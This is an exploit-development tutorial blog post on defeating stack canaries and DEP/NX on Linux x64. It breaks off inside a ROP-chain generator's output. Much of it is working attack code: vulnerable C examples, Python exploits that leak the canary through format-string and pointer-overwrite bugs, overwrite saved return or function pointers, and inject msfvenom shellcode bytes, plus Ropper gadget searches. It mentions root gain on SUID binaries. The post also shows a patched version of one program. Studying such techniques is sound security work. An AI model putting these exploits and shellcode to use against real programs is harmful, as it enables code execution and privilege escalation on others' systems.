[Exploit development] 0A- Dancing with Memory Guards: Breaking Canaries/Cookies, DEP/NX, and ASLR
Intro
In the previous post, we discussed stack-based buffer overflow vulnerabilities in depth from several aspects, such as the methods used to discover this type of vulnerability. We also touched on fuzzing and how we can benefit from it. We also talked about strategies for exploiting this type of vulnerability based on the nature of the targeted program and its working mechanisms. We also discussed methods of protection and defense against this type of vulnerability, and we explained some common mistakes that may lead to bypassing these defenses. You must read it to understand this post, as we will build on what was mentioned there.
One of the things we explained was hijacking the execution flow by overwriting the instruction pointer and forging it with another pointer that references our own instructions. In this way, we would force the program to execute arbitrary code of our own. Unfortunately, life isn’t that easy, as there are many powerful protections and mitigations that prevent us from doing this so simply.
But don’t worry, my friend. I don’t deny the power and effectiveness of these protections, especially when combined, making exploitation more difficult and complex. However, if we fully understand how these protections work and the keys of the targeted program, we can circumvent them and bypass them with creative tricks.
The F*ckin Mousetrap ( Cookies / Canaries )
This type of memory protection is exactly like a mousetrap. When your home has some openings that allow mice to enter and mess around, one solution you might take is to set traps to reduce the danger of these mice by luring them with some cheese. As soon as they fall into the trap, you get rid of them, which reduces their greater danger to vital things in the home. However, there are clever mice that can detect the trick, avoid the trap, and continue with their mission. That is where the philosophy of cookie/canary protection came from, and we will follow up on this same philosophy as mice to bypass them and not fall into the trap.
https://www.wibu.com/pl/magazine/keynote-articles/article/detail/traps-against-hacker.html
A canary/cookie is a random value generated by the program when it starts executing. Each time the program runs, it generates a unique value. This value is placed at the end of each stack frame in a subsequent location for the data and variables of the function. When the function corresponding to that frame gets called and completes execution before returning, it checks the previously generated value. If it has been hit, i.e., the value has changed, this indicates an overflow. Accordingly, the function does not return, and the program closes completely. That thwarts any exploit that attempts to overwrite the instruction pointer and redirect the program execution flow.
Analyzing Security Canaries/Cookies
Let’s take the following code as an example:
#include <stdio.h>
void main() {
char cName[16];
scanf("%s", cName);
puts( cName );
}
And compile it as follows:
┌──(user㉿host)-[~]
└─$ gcc test.c -o test
Then we disassemble the main function and find the following instructions:
0000000000001149 <main>:
1149: 55 push rbp
114a: 48 89 e5 mov rbp,rsp
114d: 48 83 ec 10 sub rsp,0x10
1151: 48 8d 45 f0 lea rax,[rbp-0x10]
1155: 48 89 c6 mov rsi,rax
1158: 48 8d 05 a5 0e 00 00 lea rax,[rip+0xea5] # 2004 <_IO_stdin_used+0x4>
115f: 48 89 c7 mov rdi,rax
1162: b8 00 00 00 00 mov eax,0x0
1167: e8 d4 fe ff ff call 1040 <__isoc99_scanf@plt>
116c: 48 8d 45 f0 lea rax,[rbp-0x10]
1170: 48 89 c7 mov rdi,rax
1173: e8 b8 fe ff ff call 1030 <puts@plt>
1178: 90 nop
1179: c9 leave
117a: c3 ret
This is roughly the familiar format of the instructions we’ve seen in previous posts. But let me show you how it will look when we ask the compiler to integrate canary/cookie protection.
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector test.c -o test
Focus on this picture carefully and compare the result of this dissemble with the previous one.

Eight bytes are loaded from the F Segment register at the main function prologue and pushed onto the stack above the saved base pointer (RBP-0x8). While in the epilogue, the original canary/cookie is compared to that on the stack. The comparison is performed as follows:
- The canary/cookie previously pushed onto the stack gets loaded into the accumulator register (RAX)
- The canary/cookie value gets subtracted from the original one in the F Segment register.
- If both are the same, the Zero Flag gets triggered, allowing execution to be redirected to the ret instruction.
- Otherwise, the execution is redirected to a function called
__stack_chk_fail
that displays a fatal error message and terminates the process.

Once passing a large input, the program execution gets hijacked by the __stack_chk_fail
function, which displays an error on the screen telling us that stack smashing occurred, and the program gets killed by the __pthread_kill_implementation
function.
The stack layout is exactly like follows:
*--------------------------* <-- Frame data & Buffers
| |
| |
| |
-0x8 -> *--------------------------* <-- Canary / Cookie
| |
+0x0 -> *--------------------------* <-- Saved RBP ( Base Pointer )
| |
+0x8 -> *--------------------------* <-- Saved RIP ( Instruction Pointer )
| |
*--------------------------*
It’s really a big challenge because the canary is placed in a critical location, where we have to overwrite it to get into vital stuff like the instruction pointer.
Leaking it out Leads to Winning!
One strategy to defeat canaries/cookies is to leak them first, then craft a payload containing the leaked canary, causing the comparison to fail because the canary in the stack after the attack is still the same as the original canary. Let’s take an example:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
char data[256];
char *cpReadData;
int nSize;
} Buffer;
Buffer buf_new() {
return (Buffer) { 0x00 };
}
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
if ( pBuf->nSize )
pBuf->data[ pBuf->nSize-1 ] = ' ';
memcpy( pBuf->data + pBuf->nSize, cpData, n );
pBuf->nSize += n;
}
void buf_read(Buffer *pBuf) {
if ( !pBuf->cpReadData )
pBuf->cpReadData = pBuf->data;
printf( pBuf->cpReadData );
pBuf->cpReadData += pBuf->nSize;
}
void buf_readall(Buffer *pBuf) {
printf( pBuf->data );
}
void main() {
Buffer buf = buf_new();
int nChoice, c;
for ( ;; ) {
printf( "\n\n1- Write\n2- Read\n3- Read full data\n4- Exit\n\nChoose: " );
scanf( "%d", &nChoice );
// Clearing the buffer so nothing breaks `getdelim` later ;)
while ( (c = getchar()) != 0x0a && c != EOF );
if ( nChoice == 1 ) {
char *cpLine = NULL;
size_t n = 0;
printf( "Data: " );
n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
buf_write( &buf, cpLine, n );
free( cpLine );
}
else if ( nChoice == 2 )
buf_read( &buf );
else if ( nChoice == 3 )
buf_readall( &buf );
else if ( nChoice == 4 )
break;
else
puts( "[-] Invalid choice!" );
}
}
This is a simple program that allows users to write and read data interactively. Let’s compile and run it with the canary protection enabled:
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
┌──(user㉿host)-[~]
└─$ ./test
1- Write
2- Read
3- Read full data
4- Exit
Choose: 1
Data: Hello Guys
1- Write
2- Read
3- Read full data
4- Exit
Choose: 2
Hello Guys
1- Write
2- Read
3- Read full data
4- Exit
Choose: 1
Data: I'm 0xNinjaCyclone
1- Write
2- Read
3- Read full data
4- Exit
Choose: 2
I'm 0xNinjaCyclone
1- Write
2- Read
3- Read full data
4- Exit
Choose: 3
Hello Guys I'm 0xNinjaCyclone
1- Write
2- Read
3- Read full data
4- Exit
Choose: 4
┌──(user㉿host)-[~]
└─$
If you pay attention to the read functions, you will find that they are both vulnerable to the format string vulnerability, where user-controled data is passed to the printf
function as a format, not in a safe way. The buf_read
function is also vulnerable to the buffer over-read vulnerability, as the pBuf->cpReadData
pointer prints what it points to and moves to the memory after what it has read without ever checking whether the memory it moved to belongs to the buffer it is supposed to read from or not. Exploiting any one of which those two bugs, would allow us to leak the secret canary/cookie.

As you can see, we can exploit the format string bug to leak the canary by injecting %49$p
as a payload via the write function and leaking it out by leveraging the read function. Read the format string exploitation post to understand what we did. We can automate this using Python as follows:
def leak_canary(p: Popen):
p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
p.stdin.flush()
out = b""
canary_pos = -1
n = 0
while n < 1024:
out = p.stdout.readline()
canary_pos = out.find( b"0x" )
if bool( ~canary_pos ):
break
n += 1
else:
return -1
canary = int( out[canary_pos : canary_pos+18], 16 )
return canary
This function takes a handler object to the target process, injects the payload, leaks the canary, and then returns the canary to the caller after converting it to an integer value or returning -1 on failure.
Now, we can craft a payload that overwrites the canary with the correct value, injects a shellcode, and redirects the execution flow by overwriting the instruction pointer.
def hijack_exec(p: Popen, canary):
payload = b""
payload += b"A" * 0x112 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
payload += b"\x90" * 0x40 # NOPs for padding
payload += buf # Shellcode
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
We followed the same approach we discussed in the buffer overflow post, filling the frame with junk data with the canary in place to bypass the protection, injecting the shellcode into the previous frame, and replacing the instruction pointer to reference the shellcode. However, for the shellcode to execute, the main function must return. We can do this using the fourth function (exit), which breaks the loop and allows the main function to return.
def exit_target(p: Popen):
p.stdin.write( b"4\n" )
This function must be called after injection to force the program to execute shellcode.
def main():
# We use 'stdbuf -o0' to force the targeted program pipes to be flushed
# So we can read leaked canary/cookie immediately
p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )
# Make stdout non-blocking when using read/readline
flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )
canary = leak_canary( p )
if bool( ~canary ):
print( "Canary : 0x%x" % canary )
hijack_exec( p, canary )
exit_target( p )
out, _ = p.communicate()
print( out.decode() )
else:
exit_target( p )
print( "[-] Failed to leak the canary" )
In the main function, we start the target process with the stdbuf -o0
command so that we can read the output efficiently while it is running, even if the process doesn’t flush the output pipes. We also force the operating system not to block the output pipes so that we don’t get stuck and deadlock occurs. Next, we leak the canary. If we succeed, the process will be injected and the execution flow will be redirected after triggering that using the exit function. If we fail, the program exits.
Let’s run the exploit:

Great, we could bypass the stack canary and execute a shellcode that runs the ‘id’ command. If the program is owned by the root and has SUID permission, we can gain root privileges as we have seen in the previous blog post.
Here is the full exploitation code:
#!/usr/bin/python3
import struct, os, fcntl
from subprocess import Popen, PIPE
TARGET_PATH = "./test"
# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true CMD="id"
buf = b""
buf += b"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50"
buf += b"\x54\x5f\x52\x66\x68\x2d\x63\x54\x5e\x52\xe8\x03"
buf += b"\x00\x00\x00\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
buf += b"\x58\x0f\x05\x48\x31\xff\x6a\x3c\x58\x0f\x05"
def leak_canary(p: Popen):
p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
p.stdin.flush()
out = b""
canary_pos = -1
n = 0
while n < 1024:
out = p.stdout.readline()
canary_pos = out.find( b"0x" )
if bool( ~canary_pos ):
break
n += 1
else:
return -1
canary = int( out[canary_pos : canary_pos+18], 16 )
return canary
def hijack_exec(p: Popen, canary):
payload = b""
payload += b"A" * 0x112 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
payload += b"\x90" * 0x40 # NOPs for padding
payload += buf # Shellcode
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
def exit_target(p: Popen):
p.stdin.write( b"4\n" )
def main():
# We use 'stdbuf -o0' to force the targeted program pipes to be flushed
# So we can read leaked canary/cookie immediately
p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )
# Make stdout non-blocking when using read/readline
flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )
canary = leak_canary( p )
if bool( ~canary ):
print( "Canary : 0x%x" % canary )
hijack_exec( p, canary )
exit_target( p )
out, _ = p.communicate()
print( out.decode() )
else:
exit_target( p )
print( "[-] Failed to leak the canary" )
if __name__ == '__main__':
main()
Therefore, the reading functions must be modified as follows to prevent such a leak from occurring:
#include <stdbool.h>
bool g_bCanRead = false;
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
if ( pBuf->nSize )
pBuf->data[ pBuf->nSize-1 ] = ' ';
memcpy( pBuf->data + pBuf->nSize, cpData, n );
pBuf->nSize += n;
g_bCanRead = true;
}
void buf_read(Buffer *pBuf) {
if ( !pBuf->cpReadData )
pBuf->cpReadData = pBuf->data;
if ( !g_bCanRead ) {
fputs( "[-] Cannot Read", stderr );
return;
}
printf( "%s", pBuf->cpReadData );
pBuf->cpReadData += pBuf->nSize;
g_bCanRead = false;
}
void buf_readall(Buffer *pBuf) {
printf( "%s", pBuf->data );
}
This modification fixes the memory disclosure vulnerabilities in the program by using the printf
function in a safe way instead of passing the user input directly as a format and also placing restrictions on the buf_read
function to prevent over-reading the buffer.
┌──(user㉿host)-[~]
└─$ python3 exploit.py
[-] Failed to leak the canary
The exploit we developed is no longer effective. Fixing memory disclosure bugs had broken it, as it relied primarily on exploiting one of them in the exploitation chain.
Don’t Worry We Still Can Leak It Without Additional Bugs
Having a vulnerability that allows data to be leaked from memory can be very helpful, but this doesn’t always happen. In such cases, the alternative solution is to use the same buffer overflow vulnerability you have in an attempt to leak secret and sensitive data from memory. Let’s review the stack layout. It looks like this:
0x00 -> *--------------------------* <-- Injection Point
| |
| |
| |
| |
| |
| |
0x100-> *--------------------------* <-- Buffer->cpReadData
| |
0x108-> *--------------------------* <-- Buffer->nSize
| |
0x110-> *--------------------------* <-- Junk data
| |
0x118-> *--------------------------* <-- Canary / Cookie
| |
0x120-> *--------------------------* <-- Saved RBP ( Base Pointer )
| |
0x128-> *--------------------------* <-- Saved RIP ( Instruction Pointer )
| |
*--------------------------*
Don’t you notice something? The Buffer->cpReadData
pointer used to read memory is under our control. We can forge that address and make it point to any other location we want in memory and leak its content. Our plan will go as follows:
- Filling the buffer until getting into the targeted pointer using the write function.
- Overwriting the
Buffer->cpReadData
with the canary address. - Leaking out the canary by triggering the read function.
- Triggering the write function again to overwrite the remaining data with a crafted payload.
- Triggering shellcode execution by leveraging the exit function that allows the main to return.
(gdb) c
Continuing.
Breakpoint 1, 0x00005555555553cf in main ()
(gdb) x/a $rbp-8
0x7fffffffdd48: 0xe1125f7dcee84f00
I attached gdb to the target process and put a breakpoint at the main function. After examining the canary, I found that it lives at 0x7fffffffdd48
in memory. However, there is a problem here: the canary always contains a null byte at its lowest order (Least Significant Byte). Therefore, we have to read from that address plus one so the null byte doesn’t stop us, and we can obtain seven bytes from leaked data and append the null ourselves.
def leak_canary(p: Popen):
payload = b""
payload += b"A" * 0x100 # Filling the stack frame
payload += struct.pack( "<Q", 0x7fffffffdd49 ) # Buffer->cpReadData
payload += (b"\x00" * 0x8) # Buffer->nSize ( To avoid touching it )
p.stdin.write( b"1\n" + payload + b"\n2\n" )
p.stdin.flush()
out = b""
canary_pos = -1
n = 0
while n < 1024:
out = p.stdout.readline()
canary_pos = out.find( b"Choose: " )
if bool( ~canary_pos ) and canary_pos+15 < len(out):
canary_pos += 8
break
n += 1
else:
return -1
canary = struct.unpack( "<Q", b"\x00" + out[canary_pos : canary_pos+7] )[ 0 ]
return canary
This function does what we discussed earlier: it leaks the canary data, attempts to parse it into an integer value, and then returns it to the caller. Things are going well, so we just need to make a few changes to the hijack_exec
function, and everything will be in order.
def hijack_exec(p: Popen, canary):
payload = b""
payload += b"A" * 0x7 # Fills the stack frame
payload += struct.pack( "<Q", canary ) # Places the correct canary value
payload += b"B" * 0x8 # Base pointer
payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
payload += b"\x90" * 0x40 # NOPs for padding
payload += buf # Shellcode
p.stdin.write( b"1\n" )
p.stdin.write( payload + b"\n" )
p.stdin.flush()
We changed almost nothing except the first line, as the leak_canary
function will fill most of the stack frame, leaving only a little space on the stack that we need to overflow to get into vital stuff.

Bingo, our plan worked.
Jumping Over The Sh1t
Not all programs are designed to operate interactively. Many take input from the user and perform their tasks directly in one fell swoop. In this case, we cannot leak the canary, whether using a vulnerability or other techniques and then complete the attack by using the overflowing vulnerability to hijack the program’s execution. In such cases, we need a creative way to defeat this protection with one shot. This isn’t easy and depends mainly on the logic of the targeted program and how it works. Let us take an example:
#include <stdio.h>
#include <stdlib.h>
typedef struct {
char data[64];
int nSize;
} Buffer;
Buffer buf_new() {
return (Buffer) { 0x00 };
}
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
while ( n-- )
pBuf->data[ pBuf->nSize++ ] = *cpData++;
}
void buf_read(Buffer *pBuf) {
printf( "%s", pBuf->data );
};
void main() {
Buffer buf = buf_new();
char *cpLine = NULL;
size_t n = 0;
printf( "Data: " );
n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
buf_write( &buf, cpLine, n );
puts( "Your Data :" );
buf_read( &buf );
}
This example is similar to the previous one. There’s nothing new in it except that it doesn’t work interactively. It reads from the user and prints the user’s input to the screen.
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
┌──(user㉿host)-[~]
└─$ ./test
Data: Hello Guys, I'm 0xNinjaCyclone.
Your Data :
Hello Guys, I'm 0xNinjaCyclone.
Focus well on this line:
pBuf->data[ pBuf->nSize++ ] = *cpData++;
It looks like a normal code that copies data from one memory to another byte by byte. But it’s not, my friend. We can abuse it in a very sinister way to jump over the canary without damaging it. Let me explain it to you more so you understand what I mean. It performs a buffer dereference based on the pBuf->nSize
value, copies to that location one byte from memory pointed to by the cpData
pointer, and increments those values by one so that it can move the next byte in the next iteration, and continues doing that in a loop until all the data has been moved.
This variable, which tells the program where to write data, is under our control. However, we can’t effectively change it completely. We can only change the byte in the lowest order because changing that byte completely changes the location we’re writing to. This is enough to defeat the protection. We can make the write jump to write directly to the instruction pointer without having to write sequentially and destroy the canary.
#!/usr/bin/python3
import struct
with open("payload", "wb") as f:
f.write( b"A" * 64 ) # Fills the Buffer
f.write( b"\x58" ) # ( (unsigned char *) &Buffer->nSize )[0] ( LSB )
f.write( struct.pack("<Q", 0x7fffffffdd70) ) # Instruction Pointer
f.write( b"\x90" * 0x40 ) # Own Code ( NOPs )
Let’s try this exploit and see if it will succeed in jumping over the canary or not.

As you can see, We’ve successfully defeated the canary and overwritten the instruction pointer, allowing us to hijack the program’s execution flow.
PreEmpting The Canary/Cookie Protection
One way to bypass this type of protection is if we have the ability to hijack the flow of program execution in ways other than modifying the instruction pointer before the validation of the canary value occurs, we can bypass it even if the canary value is destroyed. There are many scenarios that allow us to hijack the execution flow:
-
Functions Pointers: If we can control one of the function pointers and it gets called before the canary check occurs, we can bypass that protection.
-
V-Table: It’s really a magic. It’s a table that holds the methods pointer of a specific object for supporting polymorphism in the C++ language so each object can know exactly its corresponding methods without any conflict with its parent’s methods. If we could control that table, we could leverage any of its methods to execute our own code without being detected by the canary protection.
-
Windows SEH: SEH stands for Structured Exception Handling, a feature developed by Microsoft for the C/C++ languages used to handle specific exception code cases (such as hardware failures for example). These handlers are located primarily in the stack. If we can trigger an exception from them, we can leverage them to get code execution (before the canary validation).
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
typedef struct _Buffer {
char data[64];
int nSize;
void (*write)(struct _Buffer *, char *, size_t);
void (*read)(struct _Buffer *);
} Buffer;
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
memcpy( pBuf->data, cpData, n );
pBuf->nSize += (int) n;
}
void buf_read(Buffer *pBuf) {
puts( "Your Data :" );
printf( "%s", pBuf->data );
};
Buffer buf_new(bool bShouldRead) {
return (Buffer) {
.data = { 0 },
.nSize = 0,
.write = buf_write,
.read = ( bShouldRead ) ? buf_read : NULL
};
}
void main(int argc, char **argv) {
Buffer buf = buf_new( (bool)(argc > 1 && strcmp(argv[1], "-r") == 0) );
char *cpLine = NULL;
size_t n = 0;
printf( "Data: " );
n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
buf.write( &buf, cpLine, n );
if ( buf.read )
buf.read( &buf );
}
This example is very similar to the previous one, except that in this the Buffer structure has additional members that hold pointers to its associated functions, and during initialization in the buf_new function, the addresses of those functions are assigned to the structure instance.
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
┌──(user㉿host)-[~]
└─$ ./test -r
Data: Hello World!
Your Data :
Hello World!
Notice that the read function pointer is under our control, which we can trigger using the -r option. This function will be called before the canary check, allowing us to preempt the protection, hijack the program execution flow, and execute our own code.

As we said before, The function pointer we control gets called before the canary. We can abuse it by making it call our shellcode.
#!/usr/bin/python3
import struct
# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true PrependSetuid=true PrependSetgid=true CMD=id
buf = b""
buf += b"\x48\x31\xff\x6a\x69\x58\x0f\x05\x48\x31\xff\x6a"
buf += b"\x6a\x58\x0f\x05\x48\xb8\x2f\x62\x69\x6e\x2f\x73"
buf += b"\x68\x00\x99\x50\x54\x5f\x52\x66\x68\x2d\x63\x54"
buf += b"\x5e\x52\xe8\x03\x00\x00\x00\x69\x64\x00\x56\x57"
buf += b"\x54\x5e\x6a\x3b\x58\x0f\x05\x48\x31\xff\x6a\x3c"
buf += b"\x58\x0f\x05"
with open("payload", "wb") as f:
f.write( b"A" * 80 ) # Fills the Buffer
f.write( struct.pack("<Q", 0x7fffffffdd70 + 0x40) ) # Function Pointer
f.write( b"\x90" * 0x80 ) # NOPs for padding
f.write( buf ) # Shellcode
Okay, everything is in order, let’s shoot.

Other Strategies
Not all operating systems and compilers are created equal, and not all canary protection implementations are the same. Sometimes, they may be weak and improperly implemented, allowing them to be bypassed. Here are some of the shortcomings and how they can be exploited to bypass them:
-
Static Canary/Cookie: Sometimes, the value of the secret canary is fixed and does not change with each run of the program. In this case, this value can be placed in its place. When it is verified at the end of the function, the condition will be met, and the protection will be broken.
-
Weak Canary/Cookie: Sometimes, the value of the secret canary changes, but not completely. Only a small fraction of it changes each time the program runs. In this case, we can guess the canary value and then force the program to run several times until we encounter the correct value.
-
Not All Buffers Are Protected: Compilers usually put this protection on functions that have Bytes/String Buffer. Here, another exploit opportunity arises when the vulnerable code does not contain any of those buffer types.
-
Overwritable Canary/Cookie: In Windows, for example, this value lives somewhere in the PE image’s memory. If we have the ability to write to anything in memory, we can change it to a value we know. For example, this
mov qword ptr[RegisterA], RegisterB
instruction copies data from register B to the memory that is referenced by register A. If we can control these registers, we can replace the original canary.
DEP / NX == No More Direct Code Execution
In this and previous articles, we’ve always relied on hijacking the flow of program execution by injecting malicious code onto the stack and forcing the program to execute. This protection is specifically designed to prevent this. If an exploit bypasses the canary and gains control of the instruction pointer, the injected code will not be executed. Once the processor begins executing these instructions from the stack, it will trigger an interrupt, informing the operating system that something abnormal has occurred. The system will raise an access violation exception and then terminate the process.
DEP is stands for Data Execution Prevention, it’s mainly works in two mode:
-
Hardware Level Support: hardware-enforced DEP for CPUs that can mark memory pages as Non-eXecutable (NX bit). In this mode, the processor itself can prevent the execution of any code from memory pages that are not supposed to be executed.
-
Software Level Support: Software-enforced DEP is an alternative for CPUs that do not have hardware support. In this mode, the operating system intervenes itself to implement this layer of protection.
This feature is set through the boot configurations where your DEP application is set to launch at system boot in accordance with the No-eXecute (NX) page protection policy setting within the boot configuration data, and depending on the policy setting, a specific application may change the DEP setting for this process. There is also more than one mode:
-
Opt-In: DEP is only enabled for core system images and those specified in the DEP configuration. enables DEP only for operating system components, including the Windows kernel and drivers. Also, pre-selected programs by administrators.
-
Opt-Out: DEP is enabled for all programs and services except those in the exception list. If a particular program is not in the exceptions list, then DEP is enabled for that program.
-
AlwaysOn: In this mode, DEP is enabled for all processes without any exceptions and cannot be turned off at runtime.
-
AlwaysOff: This mode is the opposite of AlwaysOn, as DEP is disabled for all processes and cannot be turned on at runtime.
Each executable binary file contains information about each section and the permissions it requires, such as read, write, and execute permissions. In Windows PE files, for example, _IMAGE_SECTION_HEADER.Characteristics
represents the permissions a section requires in memory. If the IMAGE_SCN_MEM_EXECUTE
flag has been set, the operating system is forced to disable the “Non-eXecute” bit for those memory pages. The same is true for ELF files, where ElfN_Shdr.sh_flags
represents the permissions for each section. If the SHF_EXECINSTR
flag has been set, the data in that section is executable.
When we build code, the compiler and linker assign each section the permissions it needs when loaded into memory. Therefore, we use the -zexecstack
option to force the compiler to mark the stack and the data it contains as executable. When the operating system loads a binary file into memory, it marks stack memory pages as executable space. But, by default, the stack’s permissions are read and write, not execution.
Return Oriented Programming ( ROP )
Yes, we cannot redirect execution to the stack because this protection will prevent us, but we can still redirect execution to executable memory, for example, the executable section of the program itself and the libraries and modules loaded in the process address space. Let me explain more to you.
Any computer program works as follows: It executes a set of instructions sequentially, and when it encounters a return instruction, it extracts the instruction pointer previously stored in the stack and moves to execute the instructions in the memory that that pointer is referred to, and when it encounters a return instruction, it does so again until finish.
We can exploit this by controlling the instruction pointer and its location, making the program jump to execute one or more instructions followed by a return instruction (ROP Gadget). When the return instruction is executed and the instruction pointer is retrieved again, it finds a fake address pointing to another instruction or instructions followed by a return instruction. We continue doing this as a chain until we achieve a satisfactory result.
A ROP gadget can be defined as one or more instructions followed by a return instruction located somewhere in a library, module, or executable section of the program itself. It can be used in sequence with other ROP gadgets to achieve a specific goal; this is called a ROP chain.
We can hunt for needed ROP gadgets using many tools, one of them is an amazing tool called Ropper, which provides us with many features that we need in return-oriented programming. For example, if we want to hunt for ROP gadgets in libc:
┌──(user㉿host)-[~]
└─$ ropper
(ropper)> file /usr/lib/x86_64-linux-gnu/libc.so.6
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(libc.so.6/ELF/x86_64)>
We will run the tool and load the executable file using the file
command as shown.

We can extract all ROP gadgets in that file using the gadget
command, as shown in the picture above. We can also easily hunt for specific gadgets using the “search” command:
(libc.so.6/ELF/x86_64)> search pop rdi
[INFO] Searching for gadgets: pop rdi
[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x0000000000059c05: pop rdi; adc eax, 0xe762e800; std; jmp qword ptr [rsi - 0x70];
0x000000000017cd88: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rdi], ah; ret;
0x0000000000179ec8: pop rdi; add ah, byte ptr [rdx - 0x4e]; and byte ptr [rsi], ah; ret;
0x00000000000d7a01: pop rdi; add byte ptr [rax], al; add byte ptr [rdi + rcx + 0x45], al; fsubr st(1); ret 0xfff0;
0x000000000011e7a2: pop rdi; add ebx, ebp; lahf; xor eax, eax; ret;
0x000000000016b267: pop rdi; add rax, rdi; shr rax, 2; vzeroupper; ret;
0x0000000000165b47: pop rdi; add rax, rdi; vzeroupper; ret;
0x000000000016c935: pop rdi; add rdi, 0x21; add rax, rdi; vzeroupper; ret;
0x000000000011072d: pop rdi; call rax;
0x000000000011072d: pop rdi; call rax; mov rdi, rax; mov eax, 0x3c; syscall;
0x00000000000f43ad: pop rdi; cmp eax, 0x8948fff3; ret 0x448b;
0x000000000016a927: pop rdi; cmp esi, dword ptr [rdi + rax]; jne 0x16a934; add rax, rdi; vzeroupper; ret;
0x00000000001671db: pop rdi; cmp sil, byte ptr [rdi + rax]; jne 0x1671e9; add rax, rdi; vzeroupper; ret;
0x000000000002d13c: pop rdi; jmp rax;
0x0000000000054968: pop rdi; mov dword ptr [rdi], 0; mov eax, 2; ret;
0x00000000000f9a10: pop rdi; mov eax, 0x3a; syscall;
0x0000000000100a1a: pop rdi; or al, ch; iretd; jns 0x100a12; jmp qword ptr [rsi - 0x7d];
0x0000000000100b60: pop rdi; or byte ptr [rax - 0x77], cl; pop rbp; add al, ch; test dword ptr [rax - 0xe], edi; jmp qword ptr [rsi - 0x7d];
0x0000000000110e0c: pop rdi; or eax, 0x64d8f700; mov dword ptr [rdx], eax; mov eax, 0xffffffff; ret;
0x00000000001420d2: pop rdi; out dx, al; dec dword ptr [rax - 0x77]; ret 0x8548;
0x000000000002a3fc: pop rdi; pop rbp; ret;
0x000000000015e700: pop rdi; cli; dec dword ptr [rax - 0x39]; ret 0xffff;
0x000000000002a205: pop rdi; ret;
The tool has collected all the gadgets related to the instruction we are looking for (pop rdi
). We can also make the search more general.
(libc.so.6/ELF/x86_64)> search mov [rbx + 0x40],%
[INFO] Searching for gadgets: mov [rbx + 0x40],%
[INFO] File: /usr/lib/x86_64-linux-gnu/libc.so.6
0x00000000000a3bcf: mov dword ptr [rbx + 0x40], eax; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;
0x00000000001161f5: mov dword ptr [rbx + 0x40], eax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret;
0x000000000003fa47: mov dword ptr [rbx + 0x40], esi; pop rbx; ret;
0x000000000003fa28: mov dword ptr [rbx + 0x40], esi; xor eax, eax; pop rbx; ret;
0x000000000008ba03: mov dword ptr [rbx + 0x40], esp; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret;
0x000000000008be8e: mov dword ptr [rbx + 0x40], esp; pop rbx; pop rbp; pop r12; ret;
0x000000000008ba02: mov qword ptr [rbx + 0x40], r12; mov dword ptr [rbx], eax; pop rbx; pop rbp; pop r12; ret;
0x000000000008be8d: mov qword ptr [rbx + 0x40], r12; pop rbx; pop rbp; pop r12; ret;
0x00000000000a3bce: mov qword ptr [rbx + 0x40], r8; and byte ptr [rbx + 0x50], 0xfe; mov qword ptr [rbx], rdi; mov dword ptr [rbx + 0x30], eax; call rcx;
0x00000000001161f4: mov qword ptr [rbx + 0x40], rax; mov eax, 1; add rsp, 8; pop rbx; pop rbp; ret;
As you can see, we’ve made the tool search for any memory move instruction pointed to by register rbx+40
, regardless of the operand. This is very useful because, not in all cases, we’ll have gadgets that do exactly what we want. The alternative is to use different instructions indirectly to achieve the same result. The tool also provides an amazing feature to build fully ready-to-use ROP chains for us.
(libc.so.6/ELF/x86_64)> ropchain execve cmd=id
[INFO] ROPchain Generator for syscall execve:
[INFO]
write command into data section
rax 0xb
rdi address to cmd
rsi address to null
rdx address to null
[INFO] Try to create chain which fills registers without delete content of previous filled registers
[*] Try permuation 1 / 24
[INFO]
[INFO] Look for syscall gadget
[INFO] syscall gadget found
[INFO] generating rop chain
#!/usr/bin/env python
